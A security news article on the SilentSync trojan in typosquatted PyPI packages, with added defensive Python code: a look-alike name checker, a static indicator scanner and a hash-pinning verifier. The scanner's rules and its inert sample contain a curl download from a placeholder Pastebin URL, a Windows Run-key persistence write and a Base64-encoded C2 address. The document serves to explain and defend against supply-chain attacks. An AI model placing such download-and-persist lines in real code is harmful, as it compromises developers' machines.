New Python Trojan “SilentSync” Found on PyPI
Experts from Zscaler ThreatLabz have uncovered two malicious packages in the PyPI repository that, upon installation and import, secretly deploy the SilentSync Python trojan—a threat capable of seizing control of developer environments and exfiltrating sensitive data.
Both packages relied on typosquatting—the deliberate imitation of popular library names with minor alterations, designed to deceive developers and slip the trojan into their systems. SilentSync is built for data theft and remote device control: it can execute commands from its command-and-control server, upload and download files, capture screenshots, and extract browser data. Although initially tailored for Windows, it includes modules ensuring persistence on Linux and macOS as well.
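A look-alike name is the first thing a dependency review can catch. The check below is an added example written for this page (it is not Zscaler's tooling, and since the article does not say which libraries sisaws and secmeasure imitate, the names it tests are constructed): requirement names are PEP 503-normalised and compared with a reference list using optimal-string-alignment distance, so a transposed pair of letters, a doubled letter or an appended digit each count as a single edit. The `POPULAR` list and the one-or-two-edit threshold are assumptions; in practice the list would be the top-N PyPI projects plus your own lockfile.

```python
"""Typosquat check for dependency names (added example, constructed data)."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed stand-in for a download-ranked reference list.
POPULAR = [
    "requests", "numpy", "pandas", "boto3", "urllib3", "cryptography", "flask",
    "django", "pyyaml", "setuptools", "pillow", "scipy", "matplotlib", "colorama",
]


@dataclass(frozen=True)
class Verdict:
    name: str            # normalised name that was checked
    status: str          # "known" | "suspicious" | "unknown"
    closest: str | None  # nearest reference name
    distance: int | None


def normalize(name: str) -> str:
    """PEP 503 normalisation: lower-case, runs of '-', '_', '.' collapse to '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def osa_distance(a: str, b: str) -> int:
    """Levenshtein distance extended with adjacent transpositions (OSA)."""
    m, n = len(a), len(b)
    d = [[0] * (n + 1) for _ in range(m + 1)]
    for i in range(m + 1):
        d[i][0] = i
    for j in range(n + 1):
        d[0][j] = j
    for i in range(1, m + 1):
        for j in range(1, n + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1,         # deletion
                          d[i][j - 1] + 1,         # insertion
                          d[i - 1][j - 1] + cost)  # substitution
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # transposition
    return d[m][n]


def check_name(name: str, known: list[str] = POPULAR) -> Verdict:
    n = normalize(name)
    known_norm = [normalize(k) for k in known]
    if n in known_norm:
        return Verdict(n, "known", n, 0)
    closest, dist = min(((k, osa_distance(n, k)) for k in known_norm),
                        key=lambda kv: kv[1])
    # Assumed threshold: one edit for short names, two for six characters or more.
    limit = 1 if len(n) < 6 else 2
    if dist <= limit:
        return Verdict(n, "suspicious", closest, dist)
    return Verdict(n, "unknown", closest, dist)


def audit_requirements(text: str) -> list[Verdict]:
    """Run check_name over each requirement line; comments and pip options are skipped."""
    verdicts = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("-"):
            continue
        name = re.split(r"[<>=!~;\[\s@]", line, 1)[0]
        verdicts.append(check_name(name))
    return verdicts


# Constructed requirements file used as the demo input.
REQUIREMENTS = """
# constructed: two legitimate pins, two look-alikes, one internal package
requests==2.32.0
reqeusts==2.32.0
numpyy
my-internal-tool>=1.0
boto3
"""

if __name__ == "__main__":
    for v in audit_requirements(REQUIREMENTS):
        print(f"{v.name:<18} {v.status:<10} closest={v.closest} distance={v.distance}")
```

Run it against a requirements file before `pip install`; anything reported as `suspicious` deserves a look at the project page and its maintainer history, while `unknown` names simply are not on the reference list (internal packages will land there).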
The malicious activity begins as soon as the library is imported. In the case of the sisaws package, the trojan masquerades as a wrapper for the Argentinian SISA API, complete with modules named puco and renaper supposedly intended for handling personal identifiers. In reality, when the hidden gen_token function is invoked, an obfuscated script executes a curl command that fetches helper.py from Pastebin. This script deploys SilentSync, embedding it into Windows autostart via registry keys.
A similar strategy is employed in the secmeasure library, ostensibly designed for string sanitization. Behind benign-looking functions such as sanitize_input and strip_whitespace lurks the same malicious mechanism. Some of these functions even trigger deliberate errors on invocation, intended to mislead during superficial code reviews.
SilentSync connects to its command server over HTTP on port 5000, decoding the server’s address from a Base64 string. It regularly sends heartbeat signals, requests tasks, uploads stolen files, and transmits operation results. Supported instructions include executing shell commands, compressing and exfiltrating directories, taking screenshots, and harvesting data from Chrome, Brave, Edge, and Firefox—ranging from credentials to browsing history and autofill data. After completing its activities, the trojan attempts to erase its traces to evade detection.
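The behaviours described in the three paragraphs above (a shell download via curl from Pastebin, a Base64-encoded server address, a Windows Run-key write, and code that fires at import time) are all visible in source before anything executes. The scanner below is an added example written for this page, not Zscaler's tooling and not code from the sisaws or secmeasure packages: it walks a package's Python files with the standard `ast` module and reports those indicators. The rule set, the Base64-decoding heuristic and the inert sample module it scans are all constructed; the sample is only ever parsed, never run, and its URL is a placeholder.

```python
"""Static indicator scan for an unpacked Python package (added example)."""
from __future__ import annotations

import ast
import base64
import re
from dataclasses import dataclass
from pathlib import Path

# Constructed rules mirroring the write-up's indicators.
STRING_RULES = {
    "download_via_shell": re.compile(r"\b(curl|wget)\b", re.I),
    "paste_site_url": re.compile(r"pastebin\.com", re.I),
    "run_key_persistence": re.compile(r"CurrentVersion\\Run", re.I),
}
SHELL_CALLS = {"subprocess.run", "subprocess.Popen", "subprocess.call",
               "subprocess.check_output", "os.system", "os.popen"}
DECODE_CALLS = {"base64.b64decode", "base64.urlsafe_b64decode"}
B64_RX = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")


@dataclass(frozen=True)
class Finding:
    rule: str
    line: int
    detail: str


def _dotted(node: ast.AST) -> str | None:
    """'subprocess.run' for an Attribute on a plain Name, 'foo' for a bare Name."""
    if isinstance(node, ast.Attribute) and isinstance(node.value, ast.Name):
        return f"{node.value.id}.{node.attr}"
    if isinstance(node, ast.Name):
        return node.id
    return None


def decodes_to_url(text: str) -> str | None:
    """If `text` is Base64 that decodes to a URL or dotted IP, return the plaintext."""
    if not B64_RX.match(text):
        return None
    try:
        plain = base64.b64decode(text, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return plain if re.match(r"https?://|\d{1,3}(\.\d{1,3}){3}", plain) else None


def scan_source(src: str) -> list[Finding]:
    findings: list[Finding] = []
    tree = ast.parse(src)
    for node in ast.walk(tree):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            for rule, rx in STRING_RULES.items():
                if rx.search(node.value):
                    findings.append(Finding(rule, node.lineno, node.value[:60]))
            plain = decodes_to_url(node.value)
            if plain:
                findings.append(Finding("encoded_url", node.lineno, plain))
        elif isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name in SHELL_CALLS:
                findings.append(Finding("shell_execution", node.lineno, name))
            elif name in DECODE_CALLS:
                findings.append(Finding("base64_decode", node.lineno, name))
    # A call at module level runs on `import`, which is the trigger the article describes.
    for stmt in tree.body:
        if isinstance(stmt, ast.Expr) and isinstance(stmt.value, ast.Call):
            findings.append(Finding("import_time_call", stmt.lineno,
                                    _dotted(stmt.value.func) or "<call>"))
    return findings


def scan_tree(root: Path) -> dict[str, list[Finding]]:
    """Scan every .py file under an unpacked sdist or wheel directory."""
    report: dict[str, list[Finding]] = {}
    for path in sorted(root.rglob("*.py")):
        try:
            hits = scan_source(path.read_text(encoding="utf-8", errors="replace"))
        except SyntaxError as exc:
            hits = [Finding("unparseable", exc.lineno or 0, str(exc))]
        if hits:
            report[str(path.relative_to(root))] = hits
    return report


# Constructed, inert sample shaped like the write-up; it is parsed, never executed.
_C2_B64 = base64.b64encode(b"http://192.0.2.10:5000").decode()  # documentation-range IP
SAMPLE = f'''
import base64, subprocess, winreg

_C2 = "{_C2_B64}"

def sanitize_input(text):
    subprocess.run("curl -s https://pastebin.com/raw/PLACEHOLDER -o helper.py", shell=True)
    return text.strip()

def _persist():
    winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Software\\Microsoft\\Windows\\CurrentVersion\\Run")

def beacon():
    return base64.b64decode(_C2).decode()

sanitize_input("x")
'''

if __name__ == "__main__":
    for f in scan_source(SAMPLE):
        print(f"line {f.line:>3}  {f.rule:<22} {f.detail}")
```

Point `scan_tree` at the directory produced by `pip download` plus `unzip` (or `tar xf` for an sdist) rather than at an installed site-packages, so the code is examined before any import can run it. The rules are deliberately coarse; a hit is a reason to read the file, not a verdict, and a genuine HTTP client will trip `base64_decode` and `shell_execution` on its own.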
Since their emergence on August 3 and 4, the malicious packages have already seen four separate releases, underscoring the rapid evolution of the tool. This pace significantly heightens the risk of compromise through third-party dependencies and highlights the critical need for rigorous vetting of external libraries. Recommended safeguards include checksum validation, reputation-based filtering, and isolated testing environments.
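Checksum validation, the first safeguard named above, only helps if it fails closed: a requirement without a pinned hash must be refused, not silently accepted. The example below is added for this page and is not pip's own code; it mirrors what `pip install --require-hashes` enforces, parsing `--hash=sha256:` pins from a requirements file (including backslash-continued lines) and accepting a downloaded artifact only when its SHA-256 matches one of them. The lockfile text, package names and artifact bytes in `demo()` are constructed.

```python
"""Hash-pinned artifact verification in the style of --require-hashes (added example)."""
from __future__ import annotations

import hashlib
import hmac
import re
import tempfile
from pathlib import Path

HASH_PREFIX = "--hash=sha256:"


def parse_pinned(text: str) -> dict[str, set[str]]:
    """Map lower-cased requirement name -> set of allowed sha256 hex digests.

    Understands `name==ver --hash=sha256:HEX ...`, continuation lines ending in a
    backslash, trailing comments, and skips pip option lines such as `-r` / `--index-url`."""
    pins: dict[str, set[str]] = {}
    for line in text.replace("\\\n", " ").splitlines():
        line = line.split("#", 1)[0].strip()
        if not line or line.startswith("-"):
            continue
        parts = line.split()
        name = re.split(r"[<>=!~;\[]", parts[0], 1)[0].lower()
        pins[name] = {p[len(HASH_PREFIX):].lower()
                      for p in parts[1:] if p.startswith(HASH_PREFIX)}
    return pins


def sha256_file(path: Path) -> str:
    """Stream the file so large sdists do not have to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_artifact(name: str, path: Path, pins: dict[str, set[str]]) -> tuple[bool, str]:
    """Return (ok, reason). A name with no pinned hash fails closed."""
    allowed = pins.get(name.lower(), set())
    if not allowed:
        return False, f"{name}: no sha256 pinned, refusing to install"
    actual = sha256_file(path)
    if any(hmac.compare_digest(actual, h) for h in allowed):
        return True, f"{name}: sha256 matches pin"
    return False, f"{name}: sha256 {actual} matches none of {len(allowed)} pins"


def demo() -> list[tuple[bool, str]]:
    """Constructed scenario: pinned good artifact, tampered artifact, unpinned name."""
    good = b"PK\x03\x04constructed-wheel-bytes"   # stands in for a real wheel
    good_hash = hashlib.sha256(good).hexdigest()
    pins = parse_pinned(f"""
# constructed lockfile
sanitizelib==1.0.0 \\
    --hash=sha256:{good_hash}
otherlib==2.0.0
""")
    with tempfile.TemporaryDirectory() as tmp:
        wheel = Path(tmp) / "sanitizelib-1.0.0-py3-none-any.whl"
        wheel.write_bytes(good)
        results = [verify_artifact("sanitizelib", wheel, pins)]
        wheel.write_bytes(good + b"\x00")           # modified after download
        results.append(verify_artifact("sanitizelib", wheel, pins))
        results.append(verify_artifact("otherlib", wheel, pins))
    return results


if __name__ == "__main__":
    for ok, reason in demo():
        print("OK  " if ok else "FAIL", reason)
```

The pins are generated once from a trusted build (for example with `pip hash` on artifacts you have reviewed) and committed with the lockfile; the same hash set then has to match on every later install, which is what turns a new release of a look-alike package into a hard failure rather than a silent upgrade.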
The SilentSync incident serves as yet another stark reminder of the inherent vulnerabilities within the open-source ecosystem and the ever-present danger of malicious components infiltrating trusted code distribution platforms.